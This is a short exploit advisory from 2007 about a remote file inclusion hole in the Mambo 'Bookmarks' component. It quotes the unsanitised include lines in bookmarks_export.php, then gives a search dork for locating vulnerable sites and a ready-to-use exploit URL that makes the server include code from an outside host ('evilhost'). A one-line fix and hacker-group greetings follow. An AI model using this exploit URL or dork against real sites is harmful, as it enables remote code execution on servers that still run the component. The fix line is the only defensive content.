Application : Bookmarks - mambo Component

URL :
http://mamboxchange.com/frs/download.php/4274/MOS_Com_Bookmarks25-Final_a.zip

Variable $mosConfig_absolute_path not sanitized: xpl works with
register_globals=on
in components/com_bookmarks/bookmarks_export.php on line 22,27,29

$require_once( $mosConfig_absolute_path . "/includes/mambo.php" );
$include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/'
. $mosConfig_lang . '.php');
$include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/english.php');

Exploit:
~~~~~~~~

dork: "com_bookmarks"

http://www.vuln.com/components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http://evilhost

Fix
~~~~

Add before code:
defined('_VALID_MOS') or die('Direct access to this location is not
allowed.');

Discovered By     : vitux
Thanks To          : #indolinux@dal.net, #sunda@dal.net, #batamhacker@
dal.net, #malanghackerlink@dal.net
special To          : donny indocom, eko indocom, ^BLaCk_BaNDitS^, urang
subang sadaya, pokona mah kabeh lah
mail                   : vitux.manis@gmail.com, pipit_subang@yahoo.com

# cilacap 12th august 2007